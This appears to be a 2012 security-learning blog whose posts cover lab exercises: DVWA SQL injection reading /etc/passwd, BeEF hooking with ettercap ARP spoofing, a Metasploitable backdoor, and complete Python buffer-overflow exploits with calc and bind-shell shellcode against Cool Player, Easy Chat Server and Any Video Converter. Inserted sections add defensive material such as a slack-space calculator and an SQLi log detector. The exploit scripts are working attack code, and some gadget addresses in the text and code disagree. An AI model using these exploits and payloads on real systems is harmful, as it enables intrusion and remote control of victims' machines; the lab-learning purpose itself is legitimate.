=======================================================

Friday, October 26, 2012

COMPUTER FORENSICS -- INTRODUCTION


1.  Computer forensics is a branch of digital forensics (the forensic science covering the recovery and investigation of material found in digital devices). Its aim is to examine digital media in order to identify, preserve, recover, analyze and present facts and opinions about the information they hold.



2.   Slack space refers to portions of a hard drive that are not fully used by the currently allocated file and which may contain data from a previously deleted file.


3. Unallocated space is the set of clusters on a storage partition that are not in use by any active file. It also arises when a partition is deleted; the data may still be present because deletion does not fully erase it.


4. Example commands used in computer forensics:
    ==> dd if=source of=destination
    ==> cfdisk -l
    ==> fdisk /dev/sd....
    ==> ls<dev> --> e.g. lsusb
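An added example, not part of the original post, that puts a number on the slack space defined in point 2: for each file it compares the bytes the filesystem allocated with the logical size, using only stat() data. The demo() helper writes a constructed 100-byte sample file into a temporary directory; paths, function names and the sample are my own.

```python
# Added example: measure per-file slack space (allocated bytes - logical size).
import os
import tempfile

def slack_space(path):
    """Return (logical_size, allocated_bytes, slack_bytes) for one file.

    st_blocks always counts 512-byte units whatever the filesystem's real block
    size, so allocated bytes = st_blocks * 512.  The unused tail of the last
    allocated block is the slack space: it is not part of the file, but it may
    still hold bytes left behind by a file that previously used that block.
    """
    st = os.stat(path)
    allocated = st.st_blocks * 512
    # Sparse or compressed files may allocate less than their size; clamp at 0.
    slack = max(allocated - st.st_size, 0)
    return st.st_size, allocated, slack

def slack_report(directory):
    """Walk a directory tree and total logical size, allocated bytes and slack."""
    total_size = total_alloc = total_slack = 0
    per_file = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            if os.path.islink(path):
                continue          # a symlink has no data blocks of its own
            size, alloc, slack = slack_space(path)
            per_file.append((path, size, alloc, slack))
            total_size += size
            total_alloc += alloc
            total_slack += slack
    return {"files": per_file, "size": total_size,
            "allocated": total_alloc, "slack": total_slack}

def demo():
    """Create a constructed 100-byte file in a fresh temp dir and return its figures."""
    d = tempfile.mkdtemp(prefix="slack_demo_")
    p = os.path.join(d, "sample.bin")
    with open(p, "wb") as fh:
        fh.write(b"A" * 100)      # constructed sample content
    return slack_space(p)

if __name__ == "__main__":
    import sys
    rep = slack_report(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path, size, alloc, slack in rep["files"]:
        print(f"{slack:8d} slack  {size:10d} size  {alloc:10d} allocated  {path}")
    print(f"total slack: {rep['slack']} bytes over {len(rep['files'])} files")
```

Run it against a mounted image or directory; the per-file slack column is the space a carving tool would still need to look at after the logical file ends.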

Monday, October 22, 2012

DVWA ( MEDIUM ) : SQLI

Trying a pentest on DVWA at the medium security level. I use SQL injection to list the users on the target:
==> Open Burp Suite and turn intercept on
==> I use the parameter 1 or 1=1
==> Once the request is intercepted --> send it to Repeater
==> For the SQL injection I use the parameter --> 1+union+select+null,load_file(0x<hex-encoded /etc/passwd>)--+-
==> /etc/passwd hex-encoded -->  2f6574632f7061737377640a


==> I get the system's user list in Repeater with the parameter:
         --> 1+union+select+null,load_file(0x2f6574632f7061737377640a)--+-


==> This is the list I got:


==> I use SSH and compare the RSA key.

==> But I don't get a matching key.


Using file inclusion

==> we can see users on the system such as root, msfadmin, user etc.
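An added example, not part of the original post, from the defender's side of the same requests: a small detector run over constructed access-log lines that flags the tautology probe and the UNION / load_file() pattern used above, and decodes the 0x hex literal so the analyst sees which file was asked for. The log lines, IP addresses and timestamps are made up.

```python
# Added example: detect the SQLi requests from this post in web-server logs.
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined"-style log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Oct/2012:10:01:12 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4233 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Oct/2012:10:02:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1+or+1%3D1&Submit=Submit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [22/Oct/2012:10:03:07 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1+union+select+null,load_file(0x2f6574632f7061737377640a)--+-&Submit=Submit HTTP/1.1" 200 9870 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Oct/2012:10:04:00 +0700] "GET /dvwa/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Signatures for what the post sends: "or 1=1" is the tautology probe,
# UNION ... SELECT with load_file() is the file-read primitive.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "tautology": re.compile(r"\bor\b\s+\d+\s*=\s*\d+", re.I),
}
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")

def decode_hex_literals(query):
    """Decode every 0x... literal the way MySQL would, keeping printable results."""
    out = []
    for h in HEX_LITERAL.findall(query):
        try:
            out.append(bytes.fromhex(h).decode("ascii").strip())
        except (ValueError, UnicodeDecodeError):
            continue                     # odd length or non-text: not a string literal
    return out

def analyse_line(line):
    """Return None for a benign line, else a dict describing the suspicious request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    # The query string is URL-encoded in the log; decode '+' and %XX before matching.
    query = unquote_plus(path.split("?", 1)[1]) if "?" in path else ""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "signatures": hits,
            "decoded_hex": decode_hex_literals(query), "status": int(m.group("status"))}

def scan_log(text):
    """Run analyse_line over each line and return only the suspicious findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["signatures"], f["decoded_hex"])
```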



Friday, October 19, 2012

BEEF & ETTERCAP

BeEF is a web-based framework that exploits browser vulnerabilities.
==> VA ==> SET ==> BEEF

==> http://192.168.56.1:3000/beef.html ( with hook.js inside ).

example:
==> Access the HTML page containing hook.js.


==> Effect of hook.js.



Using ettercap to redirect all requests to hook.js
==> clone a web page containing the localhost hook with SET



==> ettercap -T -q -i vboxnet0 -M arp // //


==> if the process yields a session, it is possible to get a remote / Meterpreter shell with ==>  sessions -l  ==> sessions -i 1
==> but there is no session.



=======================================================================
=======================================================================

Wednesday, October 17, 2012

Looking for Vulnerability of Metasploitable

In this section I examine Metasploitable on VirtualBox to see what makes it vulnerable. OK, let's go to my virtual lab and finish the job.

1. Information Gathering
    Scan hosts
   
==> I get live hosts --> a) 192.168.56.1 ( my host )
                         b) 192.168.56.100 ( gateway )
                         c) 192.168.56.102 ( metasploitable host )

2. Service Enumeration
    Looking for running services on ==> 192.168.56.101

   
==> I get some running services.

3. Vulnerability Assessment
     Looking for possible vulnerabilities.
     ==> Nessus

    ==> I got some information about the risk of the running services.
    ==> See the picture above: I see a backdoor on port 1524.

   
4. Exploit/Pentest
   ==> telnet <host> <port>
   ==> telnet 192.168.56.102 1524


  ==> I got root
  ==> Looking for other users with ==> cat /etc/shadow


  ==> Crack the hashes with John



Looking back at the VA for another way to pentest.
==> I see the MySQL service with its default configuration.


==> I can log in with no password ==> mysql -h 192.168.56.101

=================================================================================
=================================================================================

Friday, October 12, 2012

POP POP RETN

Why is POP POP RETN used in SEH exploitation?

Because POP POP RETN is the sequence of instructions needed to build SEH (Structured Exception Handler) exploits.

How the POP POP RETN sequence executes:
Each time a POP instruction runs, ESP moves towards higher addresses by one position (1 position = 4 bytes on a 32-bit architecture). Each time a RET executes, the contents of the address ESP points at are put into EIP and executed.

So we need to escape from the SEH handler with POP POP RETN.
1. POP (first) ==> pointer to the next SEH record
2. POP (second) ==> pointer to the exception handler
3. RETN ==> the contents of the address ESP points at are put into EIP and executed.
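An added illustration, not from the original post, of the three steps above: a small model of the 32-bit stack as Windows lays it out when it calls an exception handler, with POP / POP / RETN stepped through against it. The stack and record addresses are constructed; the nSEH bytes EB 08 90 90 and the POP POP RETN address 0x10010758 are the ones the Easy Chat Server post below uses. The model assumes the standard handler calling convention (return address, EXCEPTION_RECORD pointer, then the pointer to the registration record at [ESP+8]).

```python
# Added example: why POP POP RETN lands execution on the nSEH field.
import struct

DWORD = 4
NSEH_BYTES = b"\xeb\x08\x90\x90"       # JMP SHORT +8 followed by two NOPs (from the Easy Chat post)
PPR_ADDR = 0x10010758                  # POP POP RETN gadget address used in that post

class Stack:
    """A 32-bit little-endian stack modelled as a dict of address -> dword."""
    def __init__(self):
        self.mem = {}
    def write_dword(self, addr, value):
        self.mem[addr] = value & 0xFFFFFFFF
    def read_dword(self, addr):
        return self.mem[addr]

def handler_entry_frame(stack, esp, ret_addr, exc_record, establisher_frame):
    """Lay the stack out as the exception dispatcher does when it calls a handler:
    [ESP]   return address back into the dispatcher
    [ESP+4] pointer to the EXCEPTION_RECORD
    [ESP+8] pointer to the EXCEPTION_REGISTRATION record, i.e. the nSEH field
            of the very structure the overflow overwrote."""
    stack.write_dword(esp, ret_addr)
    stack.write_dword(esp + DWORD, exc_record)
    stack.write_dword(esp + 2 * DWORD, establisher_frame)

def pop_pop_retn(stack, esp):
    """Execute POP / POP / RETN: each POP moves ESP 4 bytes toward higher
    addresses; RETN loads EIP from [ESP] and moves ESP past it."""
    esp += DWORD                        # first POP discards the dispatcher return address
    esp += DWORD                        # second POP discards the EXCEPTION_RECORD pointer
    eip = stack.read_dword(esp)         # RETN: [ESP] -> EIP ...
    esp += DWORD                        # ... and ESP moves up once more
    return eip, esp

def short_jmp_target(addr, code):
    """Decode a JMP SHORT (EB rel8) sitting at addr and return the address it reaches."""
    if code[0] != 0xEB:
        raise ValueError("not a JMP SHORT")
    rel8 = struct.unpack("<b", code[1:2])[0]        # rel8 is signed
    return addr + 2 + rel8                           # relative to the next instruction

def simulate(record_addr=0x0012FF40, esp=0x0012F000):
    """Return (eip after POP POP RETN, where the nSEH jump lands). Addresses constructed."""
    stack = Stack()
    handler_entry_frame(stack, esp, ret_addr=0x7C9032A8,      # constructed dispatcher address
                        exc_record=0x0012EF00, establisher_frame=record_addr)
    stack.write_dword(record_addr + DWORD, PPR_ADDR)          # SEH field now points at the gadget
    eip, _ = pop_pop_retn(stack, esp)                         # CPU runs the gadget "as the handler"
    landing = short_jmp_target(eip, NSEH_BYTES[:2])           # ... so the nSEH bytes execute next
    return eip, landing

if __name__ == "__main__":
    eip, landing = simulate()
    print("EIP after POP POP RETN = %08X (the nSEH field)" % eip)
    print("JMP SHORT lands at      = %08X (past the 8-byte record)" % landing)
```

The run shows EIP ending up exactly on the nSEH field, which is why the 4 bytes there must be a short jump that skips over the handler pointer into the code placed after the record.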

Monday, October 8, 2012

BUFFER OVERFLOW ( LOCAL) Direct RETN: Cool Player+Portable 2.19.2

Nice to meet you again; let's look at another application fuzzed with the BOF method. The application under trial is Cool Player+Portable 2.19.2. On to the job:

1. Look for a way to make the application crash ( I have tried it ).
    a.  Playlist
         => m3u ( no header required )
         => pls ( header needed )
   
    
2. In this section I try using a playlist with the .pls extension.
    ==> pls header
             [Playlist]
             NumberOfEntries=<count>
             File1=path
             File-n=path

    ==> To see the format above, save a playlist from Cool Player and open it in a
             text editor

3. Create the fuzzer script and run it.


4. Load the file cheat.pls in Cool Player and see the effect.


     ==> Application crashes.

5. Load it again and observe the effect in OllyDbg



6. Replace the junk with a pattern to find the offset position






7. Load the pls file again and see the pattern position.

    ==> Looking for the pattern.

   
8.  JMP ESP address.

    
    ==> JMP ESP address --> 7E455313 ==> \x13\x53\x45\xFE

I tried, but EIP was not overwritten.

9. Now I use the .m3u playlist format ( no header ).
10.  The resulting value is the same ( pattern offset --> 224 ).
11. I use the JMP ESP address ==> \xC3\xB4\xA4\x7C
12. Create the fuzzer with calc shellcode.


#!/usr/bin/python
# Python 2 script: writes the crafted playlist to disk
file="attack.pls"
#buffer="[Playlist]\n"     #11bit
#buffer+="NumberOfEntries=1\n"  #18bit
#buffer+="File1="  #6bit
buffer=""                  # the .m3u format needs no header, so the .pls header lines above stay commented out
junk="\x90"*224            # padding up to the overwritten return address (offset 224)
junk+="\xC3\xB4\xA4\x7C"   # JMP ESP address, little endian
junk+="\x90"*8             # short NOP sled before the payload
#calc.exe
junk+=("\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3e"
"\xde\x4c\x12\x83\xeb\xfc\xe2\xf4\xc2\x36\x08\x12\x3e\xde\xc7\x57"
"\x02\x55\x30\x17\x46\xdf\xa3\x99\x71\xc6\xc7\x4d\x1e\xdf\xa7\x5b"
"\xb5\xea\xc7\x13\xd0\xef\x8c\x8b\x92\x5a\x8c\x66\x39\x1f\x86\x1f"
"\x3f\x1c\xa7\xe6\x05\x8a\x68\x16\x4b\x3b\xc7\x4d\x1a\xdf\xa7\x74"
"\xb5\xd2\x07\x99\x61\xc2\x4d\xf9\xb5\xc2\xc7\x13\xd5\x57\x10\x36"
"\x3a\x1d\x7d\xd2\x5a\x55\x0c\x22\xbb\x1e\x34\x1e\xb5\x9e\x40\x99"
"\x4e\xc2\xe1\x99\x56\xd6\xa7\x1b\xb5\x5e\xfc\x12\x3e\xde\xc7\x7a"
"\x02\x81\x7d\xe4\x5e\x88\xc5\xea\xbd\x1e\x37\x42\x56\xa0\x94\xf0"
"\x4d\xb6\xd4\xec\xb4\xd0\x1b\xed\xd9\xbd\x2d\x7e\x5d\xde\x4c\x12")
fuzzer=(buffer+junk)
f=open(file,'w')
print "File Made: ", len(fuzzer)
f.write(fuzzer)
print "Yes....!",file, "Succes Made"
f.close()


13. Run the fuzzer file containing the shellcode.


14. Modify the fuzzer with bind shell shellcode


15. Try to telnet

I can't do anything after telnet because the telnet connection doesn't complete properly.
In the stack dump I see there is no space for the shellcode to land.

=================================================================================
=================================================================================

BUFFER OVERFLOW ( remote ) SEH: Easy Chat Server 2.2

OK, now I try fuzzing Easy Chat Server 2.2 remotely. Let's complete the task:

1. Observe the Easy Chat Server application.

     ==> Registration form

    ==> IP and port in use ==> 192.168.56.101:80/443
     ==> Users that have been created.
   ==> Chat rooms and their rules.

    ==> Accessed by IP address 192.168.56.101 ( default HTTP port 80 ).





   ==> Enter the first chat room ==> only this room allows guest user login.


   ** Look at the URL to get a clue:  http://192.168.56.101/chat.ghp?username=guest&password=&room=1&sex=1

2. Look for the request header to build the fuzzer.
    ==> Capture traffic with Wireshark.
    ==> Log in with the guest user and analyse the captured traffic in Wireshark.

     ==> The header matches the URL above:
           GET /chat.ghp?username=guest&password=&room=1&sex=1 HTTP/1.1


2. Create the fuzzer with the header above.

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x41"*5000
payload=("GET /chat.ghp?username="+buffer+"&password="+buffer+"&room=1 HTTP/1.1 \r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()


3. Run the fuzzer and see the impact in OllyDbg.

   ==> View the SEH chain: it contains 41414141 ==> Shift + F9


     ==> EIP overwritten.

 4. Create a pattern to find the offset position.

     ==> Effect of the fuzzer with the pattern.

     ==> EIP overwritten with 68413368
     ==> Check the pattern offset.


    ==> Pattern offset position ==> 220

 5. Look for a third-party .dll module to get a POP POP RETN

     ==> There are two modules from Easy Chat that can be used: libeay32.dll or
              ssleay32.dll
     ==> I use ssleay because its address does not contain a 00 char.

    ==> POP POP RETN address ==> 10013814 ==> \x14\x38\x01\x10
    ==> nSEH ==> \xeb\x08\x90\x90

 6. Modify the fuzzer with the structure: nop+nseh+seh
     
#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")
sock.close()







==> Result: true ==> ssleay32



    

 7. Generate shellcode with msfweb.
     ==> Bad char ==> x20


    ==> Generate payload

/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */




 8. Modify the fuzzer with the structure: nop+nseh+seh+nop+shellcode

#!/usr/bin/python
import socket

target_address="192.168.56.101"
target_port=80
buffer="\x90"*216
buffer+="\xeb\x08\x90\x90"
buffer+="\x58\x07\x01\x10"
buffer+="\x90"*500
buffer+=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"
"\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x57\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x42\x41\x58\x50\x38\x41\x42\x75\x5a\x49\x6b\x4c\x61"
"\x7a\x4a\x4b\x70\x4d\x4d\x38\x4a\x59\x6b\x4f\x4b\x4f\x69\x6f\x51"
"\x70\x4c\x4b\x70\x6c\x74\x64\x54\x64\x4e\x6b\x77\x35\x67\x4c\x4c"
"\x4b\x33\x4c\x37\x75\x62\x58\x35\x51\x6a\x4f\x6c\x4b\x50\x4f\x55"
"\x48\x4e\x6b\x51\x4f\x77\x50\x66\x61\x7a\x4b\x71\x59\x6e\x6b\x50"
"\x34\x6c\x4b\x65\x51\x7a\x4e\x44\x71\x6b\x70\x4f\x69\x6c\x6c\x4e"
"\x64\x79\x50\x43\x44\x53\x37\x49\x51\x6b\x7a\x56\x6d\x36\x61\x4f"
"\x32\x4a\x4b\x5a\x54\x37\x4b\x46\x34\x46\x44\x71\x38\x42\x55\x69"
"\x75\x4e\x6b\x41\x4f\x57\x54\x53\x31\x7a\x4b\x71\x76\x6c\x4b\x76"
"\x6c\x30\x4b\x4e\x6b\x41\x4f\x57\x6c\x74\x41\x7a\x4b\x35\x53\x66"
"\x4c\x6e\x6b\x4d\x59\x70\x6c\x64\x64\x65\x4c\x73\x51\x49\x53\x70"
"\x31\x6b\x6b\x75\x34\x4e\x6b\x37\x33\x30\x30\x6c\x4b\x37\x30\x44"
"\x4c\x4c\x4b\x30\x70\x37\x6c\x6c\x6d\x6e\x6b\x51\x50\x53\x38\x63"
"\x6e\x63\x58\x4c\x4e\x62\x6e\x76\x6e\x7a\x4c\x72\x70\x39\x6f\x4e"
"\x36\x61\x76\x36\x33\x43\x56\x61\x78\x45\x63\x30\x32\x51\x78\x44"
"\x37\x70\x73\x64\x72\x33\x6f\x66\x34\x39\x6f\x68\x50\x45\x38\x68"
"\x4b\x58\x6d\x59\x6c\x35\x6b\x36\x30\x6b\x4f\x78\x56\x73\x6f\x6f"
"\x79\x49\x75\x52\x46\x4c\x41\x38\x6d\x45\x58\x56\x62\x30\x55\x51"
"\x7a\x77\x72\x69\x6f\x4a\x70\x35\x38\x6b\x69\x77\x79\x49\x65\x6e"
"\x4d\x73\x67\x4b\x4f\x59\x46\x71\x43\x36\x33\x36\x33\x70\x53\x56"
"\x33\x50\x43\x72\x73\x43\x73\x33\x63\x79\x6f\x5a\x70\x62\x46\x73"
"\x58\x64\x51\x63\x6c\x55\x36\x42\x73\x6c\x49\x4b\x51\x6e\x75\x30"
"\x68\x6c\x64\x46\x7a\x42\x50\x6f\x37\x32\x77\x79\x6f\x7a\x76\x31"
"\x7a\x52\x30\x43\x61\x61\x45\x6b\x4f\x6e\x30\x35\x38\x6e\x44\x4c"
"\x6d\x74\x6e\x6d\x39\x36\x37\x6b\x4f\x4b\x66\x61\x43\x42\x75\x4b"
"\x4f\x58\x50\x75\x38\x4d\x35\x70\x49\x6c\x46\x50\x49\x53\x67\x4b"
"\x4f\x6a\x76\x46\x30\x53\x64\x62\x74\x61\x45\x6b\x4f\x4a\x70\x6f"
"\x63\x45\x38\x6b\x57\x32\x59\x59\x56\x61\x69\x73\x67\x79\x6f\x6b"
"\x66\x31\x45\x49\x6f\x38\x50\x52\x46\x52\x4a\x61\x74\x65\x36\x62"
"\x48\x51\x73\x50\x6d\x6f\x79\x6a\x45\x51\x7a\x76\x30\x42\x79\x77"
"\x59\x5a\x6c\x6f\x79\x68\x67\x73\x5a\x42\x64\x6c\x49\x4a\x42\x50"
"\x31\x6f\x30\x4b\x43\x4e\x4a\x4b\x4e\x61\x52\x56\x4d\x59\x6e\x30"
"\x42\x66\x4c\x4c\x53\x4e\x6d\x31\x6a\x50\x38\x6e\x4b\x6e\x4b\x6c"
"\x6b\x45\x38\x31\x62\x79\x6e\x4f\x43\x55\x46\x49\x6f\x72\x55\x52"
"\x64\x59\x6f\x78\x56\x33\x6b\x72\x77\x43\x62\x36\x31\x72\x71\x61"
"\x41\x62\x4a\x43\x31\x66\x31\x46\x31\x63\x65\x70\x51\x6b\x4f\x6a"
"\x70\x33\x58\x6c\x6d\x79\x49\x63\x35\x4a\x6e\x43\x63\x4b\x4f\x6e"
"\x36\x41\x7a\x39\x6f\x59\x6f\x30\x37\x79\x6f\x6e\x30\x4c\x4b\x70"
"\x57\x6b\x4c\x6c\x43\x48\x44\x71\x74\x39\x6f\x48\x56\x63\x62\x49"
"\x6f\x5a\x70\x71\x78\x6a\x50\x4c\x4a\x76\x64\x53\x6f\x73\x63\x6b"
"\x4f\x79\x46\x4b\x4f\x48\x50\x47")
buffer+="\x90"*(2000-len(buffer))
#buffer+="\xCC\xCC\xCC\xCC"
#buffer+="\x6D\x1D\x90\x7C"
payload=("GET /chat.ghp?username="+buffer+"&password=123&room=1 HTTP/1.1\r\n\r\n")
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
#sock.send("GET /" + buffer + "HTTP/1.1\r\n")
sock.send(payload)
print("kirim")

sock.close()


 9. Run the payload and telnet to port 4444.




===================================================================================
===================================================================================


Friday, October 5, 2012

BUFFER OVERFLOW ( LOCAL ) SEH : Any Video Converter Pro. ( 3.3.5 )

Thanks for reading my scribbled words. In this part I explore a Buffer Overflow SEH ( local ). I will explore Any Video Converter Professional (3.3.5), looking at the files in its Program Files folder. Let's start the journey:

**I tried changing the mplayer config file, but it had no effect because mplayer can't play anything == it always terminates when run.

**I tried modifying the file profiles_v2.xml as the fuzzer container. This is my structure: 

<root>
<categories>
<category name="all" id="0" icon="cat_all.bmp" desc="buffer"/>
</categories>
<groups></groups>
<profiles></profiles>
</root>

**In place of buffer I put the junk character \x41 * 1000 and create the fuzzer with Python.

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x41"*1000
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()


==> this will create the file ==> profiles_v2.xml

**Run the fuzzer and replace the file profiles_v2.xml in the any vide.... dir




==> The fuzzer has an effect
 

==> SEH chain contains the characters 41414141


==> Shift + F9 ==> yeah... EIP overwritten with 41414141

**Create a pattern, modify the fuzzer, run it and replace the .xml file again
==> see the SEH chain
==> Shift + F9

** Check the pattern offset of EIP ==>316C4130 ==>332 ( offset )
** As yesterday, modify the fuzzer with a JUMP SHORT and a dll address; I use dvcapture.dll

==>  dvcapture.dll address ==> \x33\xE6\x01\x10 ( little endian )
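The pattern-offset step used here, in the Cool Player post (steps 6 and 7) and in the Easy Chat Server post (step 4), as an added example that is not from the original posts: a small pure-Python cyclic pattern generator and offset finder with function names of my own, checked against the two EIP values those posts report (68413368 -> 220 and 316C4130 -> 332).

```python
# Added example: cyclic pattern create / offset, as used to find the EIP offset.
import string

UPPER, LOWER, DIGITS = string.ascii_uppercase, string.ascii_lowercase, string.digits
# Upper * lower * digit triplets, 3 bytes each, before the sequence repeats.
MAX_UNIQUE = len(UPPER) * len(LOWER) * len(DIGITS) * 3      # 20280 bytes

def pattern_create(length):
    """Build 'Aa0Aa1Aa2...': within MAX_UNIQUE bytes every 4-byte window is unique,
    so the 4 bytes that land in a register identify one offset."""
    if length > MAX_UNIQUE:
        raise ValueError("pattern would repeat beyond %d bytes" % MAX_UNIQUE)
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(value, length=MAX_UNIQUE):
    """Offset of a register value inside the pattern, or -1 if it is not there.

    value is either the 8 hex digits the debugger shows (e.g. '68413368'),
    read as a little-endian dword, or the 4 pattern characters themselves.
    """
    if len(value) == 8 and all(c in string.hexdigits for c in value):
        needle = bytes.fromhex(value)[::-1].decode("ascii")    # reverse byte order
    elif len(value) == 4:
        needle = value
    else:
        raise ValueError("expect 8 hex digits or 4 characters")
    return pattern_create(length).find(needle)

if __name__ == "__main__":
    print(pattern_offset("68413368"))   # 220: EIP value from the Easy Chat Server post
    print(pattern_offset("316C4130"))   # 332: EIP value from the Any Video Converter post
```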

**Modified fuzzer

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x90"*328
#buffer+="\xcc\xcc\xcc\xcc"
#buffer+="\x33\xE6\x01\x10"
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()



** Generate shellcode, modify the fuzzer and replace the .xml file again with the newest .xml fuzzer file.


==> bad characters ==> 00 0a 0d 22 26 3e

#!/usr/bin/python
fuzzfile="profiles_v2.xml"

buffer="\x90"*328
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x33\xE6\x01\x10"
buffer+=("\xb8\xb8\x0c\x2f\x1f\x2b\xc9\xdb\xc1\xd9\x74\x24\xf4\xb1\x51\x5a"
"\x31\x42\x10\x03\x42\x10\x83\x7a\x08\xcd\xea\x86\x7b\xfa\x58\x9e"
"\x85\x03\x9d\xa1\x16\x77\x0e\x79\xf3\x0c\x8a\xbd\x70\x6e\x10\xc5"
"\x87\x60\x91\x7a\x90\xf5\xf9\xa4\xa1\xe2\x4f\x2f\x95\x7f\x4e\xc1"
"\xe7\xbf\xc8\xb1\x8c\x80\x9f\xce\x4d\xca\x6d\xd1\x8f\x20\x99\xea"
"\x5b\x93\x4a\x79\x81\x50\xd5\xa5\x48\x8c\x8c\x2e\x46\x19\xda\x6f"
"\x4b\x9c\x37\x8c\x5f\x15\x4e\xfe\xbb\x35\x30\x3d\xf2\x9e\xd6\x4a"
"\xb6\x10\x9c\x0c\x35\xda\xd2\x90\xe8\x57\x52\xa0\xac\x0f\xdd\xfe"
"\x5e\x3c\xb1\x01\x88\xda\x61\x9b\x5d\x10\xb4\x0b\xe9\x25\x8a\x94"
"\x41\x35\x3a\x42\xa1\x24\x47\xa9\x65\x48\x6e\x92\x0c\x53\xe9\xad"
"\xe2\x94\xf4\xf8\x96\xa6\x07\xd2\x0f\x7e\xfe\x27\x62\xd7\xfe\x11"
"\x2e\x8b\x53\xce\x82\x68\x07\xb3\x77\x90\x77\x55\x10\x7f\x24\xff"
"\xb3\xf6\x35\x6a\x5b\xad\xac\xe4\x5b\xfa\x2f\xd2\x0e\x15\x81\x8f"
"\x31\xc5\x49\x8b\x63\xc8\x60\x84\x84\xc3\x20\x7f\x84\x3c\xae\x9a"
"\x33\x3b\x66\x33\x3b\x95\x29\xef\x97\x4f\x35\xdf\x8b\x18\x2e\xa6"
"\x6d\xa1\xe7\xa7\xa4\x07\xf7\x87\x2f\xc2\x63\x41\xd8\x71\x01\x04"
"\xfd\x1c\x89\x4f\xd7\x2c\xa0\x88\x4d\xe9\x3a\xb4\xa3\x31\xcf\x92"
"\x3a\xf3\x1d\x1c\x80\xd8\xce\x6d\x7f\x19\x5a\xc6\x2b\x31\xee\xe6"
"\x9f\xd4\xf1\x63\xa4\x27\xdb\xd0\x73\x8a\xb5\xb7\x2a\x40\x37\x66"
"\x9c\xc1\x66\x77\xce\x82\x25\x5e\xea\x9c\x65\x9f\x23\x4a\x75\xa0"
"\xfb\x74\x59\xd5\x53\x77\xd9\x2d\x3f\x78\x08\xff\x3f\x56\xdd\x0f"
"\x35\x53\x41\xbc\xb5\x8a\x82\x92")
junk = "<root>\n"
junk+= "<categories>\n"
junk+= "<category name=\"all\" id=\"0\" icon=\"cat_all.bmp\" desc=\""+buffer+"\"/>\n"
junk+= "</categories>\n"
junk+= "<groups></groups>\n<profiles></profiles>\n</root>\n"

file=open(fuzzfile,"w")
file.write(junk)
print("File "+fuzzfile+" successful created ........")
file.close()


** Run the program with the .xml payload in place




== DONE ==

===================================================================================
===================================================================================
